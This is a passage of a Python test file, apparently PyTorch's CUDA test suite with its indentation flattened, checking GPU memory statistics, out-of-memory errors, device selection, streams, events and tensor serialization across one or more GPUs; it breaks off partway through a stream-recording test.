def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour for No argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour for No argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
# advance a generator with a end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
# it will get OOM when try to allocate more than half memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
# Pushes an 0.1 second spin to stream so if the copy is non blocking,
# stream will almost surely be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.cuda.IntStorage))
q_copy[1].fill_(10)
self.assertTrue(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
# Therefore, this test uses relative comparisons, checking if the
# sum of parent and child threads execution time is greater than the
# real execution time by least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
